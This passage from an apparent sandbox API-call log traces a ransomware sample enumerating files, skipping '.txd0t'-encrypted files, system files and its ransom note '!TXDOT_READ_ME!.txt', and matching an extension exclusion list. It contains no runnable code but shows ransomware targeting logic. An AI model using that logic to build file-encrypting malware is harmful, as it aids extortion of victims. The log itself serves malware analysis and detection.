psz2=" ransomware ") returned 1 [0117.927] StrCmpIW (psz1="SetupUtility.exe", psz2=" ransom ") returned 1 [0117.927] StrCmpIW (psz1="SetupUtility.exe", psz2="debug.txt") returned 1 [0117.927] StrCmpIW (psz1="SetupUtility.exe", psz2="boot.ini") returned 1 [0117.927] StrCmpIW (psz1="SetupUtility.exe", psz2="desktop.ini") returned 1 [0117.927] StrCmpIW (psz1="SetupUtility.exe", psz2="autorun.inf") returned 1 [0117.927] StrCmpIW (psz1="SetupUtility.exe", psz2="ntuser.dat") returned 1 [0117.935] StrCmpIW (psz1="SetupUtility.exe", psz2="ntldr") returned 1 [0117.935] StrCmpIW (psz1="SetupUtility.exe", psz2="ntdetect.com") returned 1 [0117.935] StrCmpIW (psz1="SetupUtility.exe", psz2="bootfont.bin") returned 1 [0117.945] StrCmpIW (psz1="SetupUtility.exe", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.945] PathFindExtensionW (pszPath="SetupUtility.exe") returned=".exe" [0117.945] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".exe") returned=".exe|.bat|.cmd|.url|.mui" [0117.945] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x596902d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa278, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SplashScreen.bmp.txd0t", cAlternateFileName="SPLASH~1.TXD")) returned 1 [0117.946] StrCmpW (psz1="SplashScreen.bmp.txd0t", psz2=".") returned 1 [0117.946] StrCmpW (psz1="SplashScreen.bmp.txd0t", psz2="..") returned 1 [0117.946] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.946] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.946] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SplashScreen.bmp.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SplashScreen.bmp.txd0t") returned="C:\\588bce7c90097ed212\\SplashScreen.bmp.txd0t" [0117.946] PathFindExtensionW (pszPath="SplashScreen.bmp.txd0t") returned=".txd0t" [0117.946] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.946] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x143bc400, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0x143bc400, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x143bc400, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x23420, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0117.946] StrCmpW (psz1="sqmapi.dll", psz2=".") returned 1 [0117.946] StrCmpW (psz1="sqmapi.dll", psz2="..") returned 1 [0117.946] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.946] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.946] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="sqmapi.dll", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\sqmapi.dll") returned="C:\\588bce7c90097ed212\\sqmapi.dll" [0117.946] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0117.946] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0117.946] StrCmpIW (psz1="sqmapi.dll", psz2="bootsect.bak") returned 1 [0117.946] StrCmpIW (psz1="sqmapi.dll", psz2="iconcache.db") returned 1 [0117.946] StrCmpIW (psz1="sqmapi.dll", psz2="thumbs.db") returned -1 [0117.946] StrCmpIW (psz1="sqmapi.dll", psz2=" ransomware ") returned 1 [0117.956] StrCmpIW (psz1="sqmapi.dll", psz2=" ransom ") returned 1 [0117.956] StrCmpIW (psz1="sqmapi.dll", psz2="debug.txt") returned 1 [0117.957] StrCmpIW (psz1="sqmapi.dll", psz2="boot.ini") returned 1 [0117.957] StrCmpIW (psz1="sqmapi.dll", psz2="desktop.ini") returned 1 [0117.957] StrCmpIW (psz1="sqmapi.dll", psz2="autorun.inf") returned 1 [0117.957] StrCmpIW (psz1="sqmapi.dll", psz2="ntuser.dat") returned 1 [0117.957] StrCmpIW (psz1="sqmapi.dll", psz2="ntldr") returned 1 [0117.957] StrCmpIW (psz1="sqmapi.dll", psz2="ntdetect.com") returned 1 [0117.957] StrCmpIW (psz1="sqmapi.dll", psz2="bootfont.bin") returned 1 [0117.957] StrCmpIW (psz1="sqmapi.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.964] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0117.964] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.965] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0x596902d4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3904, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Strings.xml.txd0t", cAlternateFileName="STRING~1.TXD")) returned 1 [0117.965] StrCmpW (psz1="Strings.xml.txd0t", psz2=".") returned 1 [0117.965] StrCmpW (psz1="Strings.xml.txd0t", psz2="..") returned 1 [0117.965] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.965] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.965] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Strings.xml.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Strings.xml.txd0t") returned="C:\\588bce7c90097ed212\\Strings.xml.txd0t" [0117.965] PathFindExtensionW (pszPath="Strings.xml.txd0t") returned=".txd0t" [0117.965] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.965] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x596dc778, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x99f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="UiInfo.xml.txd0t", cAlternateFileName="UIINFO~1.TXD")) returned 1 [0117.965] StrCmpW (psz1="UiInfo.xml.txd0t", psz2=".") returned 1 [0117.965] StrCmpW (psz1="UiInfo.xml.txd0t", psz2="..") returned 1 [0117.965] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.965] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.965] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="UiInfo.xml.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\UiInfo.xml.txd0t") returned="C:\\588bce7c90097ed212\\UiInfo.xml.txd0t" [0117.965] PathFindExtensionW (pszPath="UiInfo.xml.txd0t") returned=".txd0t" [0117.965] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.965] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x596dc778, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x19888, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="watermark.bmp.txd0t", cAlternateFileName="WATERM~1.TXD")) returned 1 [0117.965] StrCmpW (psz1="watermark.bmp.txd0t", psz2=".") returned 1 [0117.965] StrCmpW (psz1="watermark.bmp.txd0t", psz2="..") returned 1 [0117.973] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.973] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.973] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="watermark.bmp.txd0t", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\watermark.bmp.txd0t") returned="C:\\588bce7c90097ed212\\watermark.bmp.txd0t" [0117.973] PathFindExtensionW (pszPath="watermark.bmp.txd0t") returned=".txd0t" [0117.994] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.994] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.0-KB956250-v6001-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0117.994] StrCmpW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2=".") returned 1 [0117.994] StrCmpW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="..") returned 1 [0118.002] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0118.002] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0118.002] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.0-KB956250-v6001-x64.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" [0118.003] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x64.msu") returned=".msu" [0118.003] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0118.003] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="bootsect.bak") returned 1 [0118.010] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="iconcache.db") returned 1 [0118.020] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="thumbs.db") returned 1 [0118.020] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2=" ransomware ") returned 1 [0118.020] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2=" ransom ") returned 1 [0118.020] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="debug.txt") returned 1 [0118.020] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="boot.ini") returned 1 [0118.020] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="desktop.ini") returned 1 [0118.020] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="autorun.inf") returned 1 [0118.020] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="ntuser.dat") returned 1 [0118.020] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="ntldr") returned 1 [0118.028] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="ntdetect.com") returned 1 [0118.028] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="bootfont.bin") returned 1 [0118.028] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x64.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0118.028] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x64.msu") returned=".msu" [0118.028] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0118.028] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.0-KB956250-v6001-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0118.035] StrCmpW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2=".") returned 1 [0118.035] StrCmpW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="..") returned 1 [0118.035] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0118.036] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0118.036] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.0-KB956250-v6001-x86.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" [0118.043] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x86.msu") returned=".msu" [0118.043] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0118.043] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="bootsect.bak") returned 1 [0118.043] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="iconcache.db") returned 1 [0118.043] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="thumbs.db") returned 1 [0118.043] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2=" ransomware ") returned 1 [0118.043] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2=" ransom ") returned 1 [0118.043] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="debug.txt") returned 1 [0118.043] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="boot.ini") returned 1 [0118.043] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="desktop.ini") returned 1 [0118.043] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="autorun.inf") returned 1 [0118.044] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="ntuser.dat") returned 1 [0118.044] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="ntldr") returned 1 [0118.044] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="ntdetect.com") returned 1 [0118.044] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="bootfont.bin") returned 1 [0118.044] StrCmpIW (psz1="Windows6.0-KB956250-v6001-x86.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0118.044] PathFindExtensionW (pszPath="Windows6.0-KB956250-v6001-x86.msu") returned=".msu" [0118.044] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0118.049] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0118.049] StrCmpW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2=".") returned 1 [0118.049] StrCmpW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="..") returned 1 [0118.049] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0118.049] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0118.049] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.1-KB958488-v6001-x64.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" [0118.049] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x64.msu") returned=".msu" [0118.050] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0118.050] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="bootsect.bak") returned 1 [0118.050] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="iconcache.db") returned 1 [0118.050] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="thumbs.db") returned 1 [0118.062] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2=" ransomware ") returned 1 [0118.062] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2=" ransom ") returned 1 [0118.062] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="debug.txt") returned 1 [0118.062] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="boot.ini") returned 1 [0118.062] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="desktop.ini") returned 1 [0118.062] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="autorun.inf") returned 1 [0118.062] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="ntuser.dat") returned 1 [0118.062] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="ntldr") returned 1 [0118.062] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="ntdetect.com") returned 1 [0118.062] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="bootfont.bin") returned 1 [0118.062] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x64.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0118.070] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x64.msu") returned=".msu" [0118.070] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0118.070] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0118.070] StrCmpW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2=".") returned 1 [0118.070] StrCmpW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="..") returned 1 [0118.070] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0118.070] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0118.486] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Windows6.1-KB958488-v6001-x86.msu", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu" [0118.486] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x86.msu") returned=".msu" [0118.486] StrCmpW (psz1=".msu", psz2=".txd0t") returned -1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="bootsect.bak") returned 1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="iconcache.db") returned 1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="thumbs.db") returned 1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2=" ransomware ") returned 1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2=" ransom ") returned 1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="debug.txt") returned 1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="boot.ini") returned 1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="desktop.ini") returned 1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="autorun.inf") returned 1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="ntuser.dat") returned 1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="ntldr") returned 1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="ntdetect.com") returned 1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="bootfont.bin") returned 1 [0118.486] StrCmpIW (psz1="Windows6.1-KB958488-v6001-x86.msu", psz2="!TXDOT_READ_ME!.txt") returned 1 [0118.486] PathFindExtensionW (pszPath="Windows6.1-KB958488-v6001-x86.msu") returned=".msu" [0118.486] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msu") returned=".msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0118.486] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 0 [0118.486] FindClose (in: hFindFile=0xec19b0 | out: hFindFile=0xec19b0) returned 1 [0118.486] GetProcessHeap () returned 0xe30000 [0118.486] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0118.486] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0118.486] StrCmpW (psz1="Boot", psz2=".") returned 1 [0118.487] StrCmpW (psz1="Boot", psz2="..") returned 1 [0118.487] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: lpFindFileData=0x599f650*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0118.487] StrCmpW (psz1="bootmgr", psz2=".") returned 1 [0118.487] StrCmpW (psz1="bootmgr", psz2="..") returned 1 [0118.487] FindNextFileW (in: hFindFile=0xec1ef0, lpFindFileData=0x599f650 | out: 